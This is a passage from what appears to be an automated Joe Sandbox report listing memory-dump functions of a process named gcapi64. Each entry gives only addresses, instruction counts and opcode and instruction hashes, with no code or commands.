                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8f794a624525443c207cc404cc98e544a17c683e925aca81b4cc7aa69ffae18
                                                                  • Instruction ID: 7ec301af9622fec01f92e642c41dafeb1f5adaf638f57fa0ea4f30fe736346e6
                                                                  • Opcode Fuzzy Hash: d8f794a624525443c207cc404cc98e544a17c683e925aca81b4cc7aa69ffae18
                                                                  • Instruction Fuzzy Hash: DD31D052A0FBCD0FE76687B888B41A47FA19F57210F0A01EBD0C8CB0F3D9886D498352
                                                                  Function 00007FFD9BA00C89 Relevance: .1, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c72f388c23ba2417d2b7200522976e00855cff90bc846e746e5345c7b9597187
                                                                  • Instruction ID: 8fc29f0e86f43adb9a572f7375a5b8bb05b0bf54361a3e9186a54082006e6fd8
                                                                  • Opcode Fuzzy Hash: c72f388c23ba2417d2b7200522976e00855cff90bc846e746e5345c7b9597187
                                                                  • Instruction Fuzzy Hash: 1F21AB22B0EA4E1FE379A76CA8559B177D1EF82760B1601FAE4CDC71A7DC58BC028350
                                                                  Function 00007FFD9BA0C740 Relevance: .1, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b39a186900208c63c49554f097b8b3e21da51dd29689f3b2fb8d0a4653e2c70b
                                                                  • Instruction ID: 0996f86c5e649e2fd66bde6e9416dec4b85624574ff31a39bc803f6172930917
                                                                  • Opcode Fuzzy Hash: b39a186900208c63c49554f097b8b3e21da51dd29689f3b2fb8d0a4653e2c70b
                                                                  • Instruction Fuzzy Hash: E221D821B19D0E4FEBA8EB5C90A47B662D2FF99300F55417AD05DC31A6DF18ED058380
                                                                  Function 00007FFD9B6CFDF0 Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97d62cf3726360dc2f6aaeab7035bce1c57da3e5a4b46fc6c25ab1120bbe7b95
                                                                  • Instruction ID: 9b8adab11c576883e2fede9e0b776943dfc3eb1a4e7c8799c6245ba9b364701d
                                                                  • Opcode Fuzzy Hash: 97d62cf3726360dc2f6aaeab7035bce1c57da3e5a4b46fc6c25ab1120bbe7b95
                                                                  • Instruction Fuzzy Hash: B931A516A0D1A646E71577B8B47A9FA7F90CF02328F4C86F3E4EE4C0DBDE1860858285
                                                                  Function 00007FFD9BA08BC1 Relevance: .1, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c348dcefffebd57479d9895d66dc761b90803306b8e924ce18173614543f1ec
                                                                  • Instruction ID: 1ebdebd220f1c7e014d4cb6d60a1f501a40c4bfe855732a7be91a3ff2b21b48f
                                                                  • Opcode Fuzzy Hash: 8c348dcefffebd57479d9895d66dc761b90803306b8e924ce18173614543f1ec
                                                                  • Instruction Fuzzy Hash: EA31C17070CA0D4FDBA8EB6C84A4A29B7D1FF99314F5115BDE04EC32A6CE65EC418780
                                                                  Function 00007FFD9B6C7910 Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dfc02aa913d8e4dc5d208b507db9bb1d3ca49fbe3ef1487dfaa20507f3a687b7
                                                                  • Instruction ID: 74b0bd8ff4032164eb63a0fea531af71f31e14c37d6df2e03d7289ee773d1d13
                                                                  • Opcode Fuzzy Hash: dfc02aa913d8e4dc5d208b507db9bb1d3ca49fbe3ef1487dfaa20507f3a687b7
                                                                  • Instruction Fuzzy Hash: 2D21A732B0990D4FEB98F7FD946997863E2EF9935074500B6E51DCB2B2ED15BC424340
                                                                  Function 00007FFD9BA0047A Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: adc469e2d9cb5a32498351921a45374438550c98daf7bf7dd0f87e39fc806fb9
                                                                  • Instruction ID: eb6af86819bb5029a00b096585402daa90a955af9248640f696e45f989835ae9
                                                                  • Opcode Fuzzy Hash: adc469e2d9cb5a32498351921a45374438550c98daf7bf7dd0f87e39fc806fb9
                                                                  • Instruction Fuzzy Hash: 49313431A09B8C9FD768EF6884152A937E1FF8A314F04417EE48DC72A2DA35A812C744
                                                                  Function 00007FFD9BA00268 Relevance: .1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3f01fd9d625c5351abd9096ed0599de3e53672c2ac1343ac0674a27d03f2111
                                                                  • Instruction ID: e035dd79308a194c3365bb43cf4a3521640874e7b5934fb75f6052ce1f418ff7
                                                                  • Opcode Fuzzy Hash: f3f01fd9d625c5351abd9096ed0599de3e53672c2ac1343ac0674a27d03f2111
                                                                  • Instruction Fuzzy Hash: BF21A97190CA1C4FDB68EB58DC465F9B7E4EB95321F00417FD48ED3151DA70B9458B82
                                                                  Function 00007FFD9BA1D195 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a79fe1106e731b5c6bc6ebc627da47674c2d4dc67292d41fd24d68e111a4bb51
                                                                  • Instruction ID: 99d408c9623bf063361aa985a8425e65b71a44f67c08fe4e1d0c396468bf04ca
                                                                  • Opcode Fuzzy Hash: a79fe1106e731b5c6bc6ebc627da47674c2d4dc67292d41fd24d68e111a4bb51
                                                                  • Instruction Fuzzy Hash: 30315A31A0A65D8FCB51EF68C8606EE3BB1EF4A310F0601BBE408D7192CF74A805C390
                                                                  Function 00007FFD9BA10071 Relevance: .1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 863be90533c2551021d8bcc77e6186333a934bfe9807e9b9805cab395f8329e2
                                                                  • Instruction ID: d17f0f051fd069fd1f926770c7d074620cb7935d60b76f33b2bf7345ee047456
                                                                  • Opcode Fuzzy Hash: 863be90533c2551021d8bcc77e6186333a934bfe9807e9b9805cab395f8329e2
                                                                  • Instruction Fuzzy Hash: F921073170EE891FD7A9D7BC98696B577E1EF5A30070901BAD08DC72B7CD59A8428380
                                                                  Function 00007FFD9BA00DB5 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2cee86ac540e4d043377815a5838a0c82870757d29ac6105946639c14aae6c1
                                                                  • Instruction ID: c5cffb7d5b25bf3d593339853471c14cf1eece9ba8a58cb7fd597857dfcdcc04
                                                                  • Opcode Fuzzy Hash: d2cee86ac540e4d043377815a5838a0c82870757d29ac6105946639c14aae6c1
                                                                  • Instruction Fuzzy Hash: 1D213A2160DA9D0FE7A1972CA464AB07FD1DFA6620F0905BBE4C8C71B2D858D9C1C345
                                                                  Function 00007FFD9B795366 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce67c6e0d1ae4ca6c371d4251fd0bca0fbd2ef55d5e9e78eca2fd8bcc7352a66
                                                                  • Instruction ID: edfd80fe37cacc68ac7b438e9490f8e19100ce794f47b881262928a23c701e78
                                                                  • Opcode Fuzzy Hash: ce67c6e0d1ae4ca6c371d4251fd0bca0fbd2ef55d5e9e78eca2fd8bcc7352a66
                                                                  • Instruction Fuzzy Hash: 4631A471E0971E8FEFA0DE98C4656BD77B1EF98340F110276D00EE31A1DE346A468790
                                                                  Function 00007FFD9BA04440 Relevance: .1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1ecca8174e93ef00cfef208f1ab2956ddc1826e101f319f36addfb5c1f941d6d
                                                                  • Instruction ID: f52b33d561fd3e99bcdfc41fb3f09a79e39f98453b511638ad057ab4d79362a9
                                                                  • Opcode Fuzzy Hash: 1ecca8174e93ef00cfef208f1ab2956ddc1826e101f319f36addfb5c1f941d6d
                                                                  • Instruction Fuzzy Hash: 2B114332B1AE1E0FE378A69D586587173E1FF85360B56017DE08DC32A6ED56BC424380
                                                                  Function 00007FFD9BA03D94 Relevance: .1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cec1c8144a5ae5d1bf3d82ebdd63d7798a3a414fdd0b005c230d480e8e4637a4
                                                                  • Instruction ID: 6a9c3507a76d1212d95c2b6fa5b0475cb22ce760ce3b3f8e80bf3bc484950267
                                                                  • Opcode Fuzzy Hash: cec1c8144a5ae5d1bf3d82ebdd63d7798a3a414fdd0b005c230d480e8e4637a4
                                                                  • Instruction Fuzzy Hash: F9212D31B1EF494FE665A77C54211B477D2FF99310B5905BDD08AC72A7CD29B9438340
                                                                  Function 00007FFD9BA00CB0 Relevance: .1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fbc838a2b260e66ab6e5a0db8788618831f592c668ae31a2eb59fb35f59db14b
                                                                  • Instruction ID: ee15c8c37303c27f5a86f46c68cbacdd72629dd7e84549a8d609cbd07eb87a84
                                                                  • Opcode Fuzzy Hash: fbc838a2b260e66ab6e5a0db8788618831f592c668ae31a2eb59fb35f59db14b
                                                                  • Instruction Fuzzy Hash: 5E118C32B1EE0E0FE3BCA75C985557573C2EF95760B4602BAE08DC3296ED14BC024394
                                                                  Function 00007FFD9BA09430 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d029de9a6e598fdb4404612f49066f3c72b9c52dba57ee847564f08c4a22659f
                                                                  • Instruction ID: f50787df8df64a9981170aa8d88bd12cb525416f11daab3ae9f62a756aada351
                                                                  • Opcode Fuzzy Hash: d029de9a6e598fdb4404612f49066f3c72b9c52dba57ee847564f08c4a22659f
                                                                  • Instruction Fuzzy Hash: 00217E34A18A4E8FDB98EF28C4647EA73A1FF58304F500569E41AC7296CF76E951CB40
                                                                  Function 00007FFD9B7951C6 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 09b142212919205beadf26be6b78c79766c8d034c0aabe1d3125fc3558dc7372
                                                                  • Instruction ID: 8fd9444f7c47d8ab874f5d6b71e58553cb923431044fa2a6c9bd18e41eb0439a
                                                                  • Opcode Fuzzy Hash: 09b142212919205beadf26be6b78c79766c8d034c0aabe1d3125fc3558dc7372
                                                                  • Instruction Fuzzy Hash: 6A214FB1E09A1D8FEFA4DE98C4557ED77B1EFA8350F114276C00DE3161DA3469828B90
                                                                  Function 00007FFD9B6CFDCF Relevance: .1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d98055a8a0ebd365143ad350eb5fe1bbf5db445eb8d3b1c14745e536f5763cf
                                                                  • Instruction ID: 055b3428f44cecd5c43330ae60ca97f847960df7e63c6d0b20cb951e854a309d
                                                                  • Opcode Fuzzy Hash: 0d98055a8a0ebd365143ad350eb5fe1bbf5db445eb8d3b1c14745e536f5763cf
                                                                  • Instruction Fuzzy Hash: 6921D822A0D15646E715B7B8B4799FA7F90CF02328F4C46F3E4DE4D0E7DE1861458245
                                                                  Function 00007FFD9B6C2BB8 Relevance: .1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 81d8db414d4bdd8096e71c363b995f4c4eade51ca65b3516ac220d33268491e7
                                                                  • Instruction ID: c3f987a177ada14dccd2579de3179946e48a52ca3eeb5651dd0357b4d561665f
                                                                  • Opcode Fuzzy Hash: 81d8db414d4bdd8096e71c363b995f4c4eade51ca65b3516ac220d33268491e7
                                                                  • Instruction Fuzzy Hash: D911C431B19D0E0FDBD4FA6D94A8BB573C2FBAC2557450176E81CC7265EE25EC424700
                                                                  Function 00007FFD9BA17118 Relevance: .1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fc1131cc805163190ad7d85cb7328e0f5fef977844e2262d59a181d7695c16fa
                                                                  • Instruction ID: abffe7973646f34659c05f29ffe19e5c28497a7119bb173b0cf673c6af6029c5
                                                                  • Opcode Fuzzy Hash: fc1131cc805163190ad7d85cb7328e0f5fef977844e2262d59a181d7695c16fa
                                                                  • Instruction Fuzzy Hash: 4811DF72A0EB8D4FDBB59F5C58242A93BE0EF59740F0516ABF449C31B3DE64AD048380
                                                                  Function 00007FFD9B79552E Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 99b418345e4fbc8d53bf7bb595cc5bde6125c0edb06f0a82a41fd4abe5aee8a7
                                                                  • Instruction ID: db1ae9a102e9b804c33ad024865f0c0b46d73c207aabdae66c70486794342f56
                                                                  • Opcode Fuzzy Hash: 99b418345e4fbc8d53bf7bb595cc5bde6125c0edb06f0a82a41fd4abe5aee8a7
                                                                  • Instruction Fuzzy Hash: E5212A71E09A1D8FEFA0DF98D4557AD77B1FF68350F1142B6D00DE2261DA346A828B90
                                                                  Function 00007FFD9BA10A89 Relevance: .1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0faf0c6b4699a3ce4fb44bb6c33049f4c199bc76bd15bd1f3442294804819dde
                                                                  • Instruction ID: 2eda879210f335fe0f8217149517de43dc25c4945bd9620d784bc7f1f9dd87fa
                                                                  • Opcode Fuzzy Hash: 0faf0c6b4699a3ce4fb44bb6c33049f4c199bc76bd15bd1f3442294804819dde
                                                                  • Instruction Fuzzy Hash: 1201457260E74D5EE72A8668AC071F23BD8DB83230B01026BE0C9C3062EC51AC4782E2
                                                                  Function 00007FFD9B795382 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a9145ff9ca067b69a7855856fe8d6eea111528909a42fdfebac5413748d917b
                                                                  • Instruction ID: 8fbec99aacc4a00c92419b793de1a7109c97ed86bcf5ead183299eae17454717
                                                                  • Opcode Fuzzy Hash: 0a9145ff9ca067b69a7855856fe8d6eea111528909a42fdfebac5413748d917b
                                                                  • Instruction Fuzzy Hash: 8E215B71E09A1E8FEFA4DF98C4517AD77B1FF98340F114276D00DE32A1DA346A828B90
                                                                  Function 00007FFD9B7952B2 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12aeae46141c33688231ef611ee8df3b5fc29de37084ae9cfb46e78c006e9bac
                                                                  • Instruction ID: 7a3d67daea1f7d21d917a3feca44648d064d32af1282af5696b2012e3079ecf4
                                                                  • Opcode Fuzzy Hash: 12aeae46141c33688231ef611ee8df3b5fc29de37084ae9cfb46e78c006e9bac
                                                                  • Instruction Fuzzy Hash: A5212C71E09A1D8FEFA4DE98D8517AD77B1EF58350F114276D00DE3261CA346A868B90
                                                                  Function 00007FFD9BA0CFA0 Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59f5654a0dbb7df1b28043c980ae194c78a44aa32ba9e8907966dcd74ebabf36
                                                                  • Instruction ID: 2e1b60a8b59fb8c0b323ed438376e85933fd39512806a211b60cbe9964be1a40
                                                                  • Opcode Fuzzy Hash: 59f5654a0dbb7df1b28043c980ae194c78a44aa32ba9e8907966dcd74ebabf36
                                                                  • Instruction Fuzzy Hash: B2012621B2CE090BD768B7189055AF7F3D1EBA8310F40467EE45FC31DADE6AB9058381
                                                                  Function 00007FFD9BA107A0 Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3f6907c42b5812682408b09d379ce2a8587668cd68c248cc717e246871e40bf
                                                                  • Instruction ID: 80ced490205561bf6433beb78fb46698f86ce6c01f502765931ef2e1bfd8f8c3
                                                                  • Opcode Fuzzy Hash: f3f6907c42b5812682408b09d379ce2a8587668cd68c248cc717e246871e40bf
                                                                  • Instruction Fuzzy Hash: 0C11C071A0F7890FC7B4E778981E5593BD0EFC6316B0501FEC088CB1A2EAA8180AC381
                                                                  Function 00007FFD9BA0D050 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6b8069b9f6fcabdeabadd096c356ee61bfc1e27b153f789b73f129d5480dfe64
                                                                  • Instruction ID: 48a7d996cc2346046d766e704bc261a84981a223e33acf6a25f94920259c0200
                                                                  • Opcode Fuzzy Hash: 6b8069b9f6fcabdeabadd096c356ee61bfc1e27b153f789b73f129d5480dfe64
                                                                  • Instruction Fuzzy Hash: 3E012431B2EC0D1FD7D8BB5CA4A8AB972C1EBA8300741017AE81DC72A6DD46EC418380
                                                                  Function 00007FFD9B6D036D Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2688e790bc1ba8f5822a7afd7b6a0dee4676bc03c6b57c0943e97c44fcccab6
                                                                  • Instruction ID: 39d2e922929d5d3cc441f1a446671020486b1997f373bf7c877faaa1b7bfa86d
                                                                  • Opcode Fuzzy Hash: c2688e790bc1ba8f5822a7afd7b6a0dee4676bc03c6b57c0943e97c44fcccab6
                                                                  • Instruction Fuzzy Hash: 4B118E30A19A4E9FEB54EFA8D8596FD77A0FF44300F11057AE82CC61A1DB34B2A0CB41
                                                                  Function 00007FFD9B6CB585 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 725e1a35787655c278f0c6a39dfabb5d68596d13727bc623d51f34cb7ff6c262
                                                                  • Instruction ID: cbabc779eb29563a2fe054a51ba56dcf02071b37e0d5788ed4e0d1f595bc3b47
                                                                  • Opcode Fuzzy Hash: 725e1a35787655c278f0c6a39dfabb5d68596d13727bc623d51f34cb7ff6c262
                                                                  • Instruction Fuzzy Hash: E111212294E6CD1FE752BBA868750F87FF0DF87220B0801FBD5A5CB0A3E8452A56C301
                                                                  Function 00007FFD9BA14B86 Relevance: .1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c7539098abfdada10d03b70372b59c43985f2ef3989b633e83e25bc67bf21ed
                                                                  • Instruction ID: d38cc1b8f5ff57c6c0d140f83d829898fc3c020572e382bb4f8b041a52e19876
                                                                  • Opcode Fuzzy Hash: 9c7539098abfdada10d03b70372b59c43985f2ef3989b633e83e25bc67bf21ed
                                                                  • Instruction Fuzzy Hash: 8A012224B0EE4E0FD7A993AC54283B47AC1DF8A300F4A40BED04DC71F6DDAD9A424381
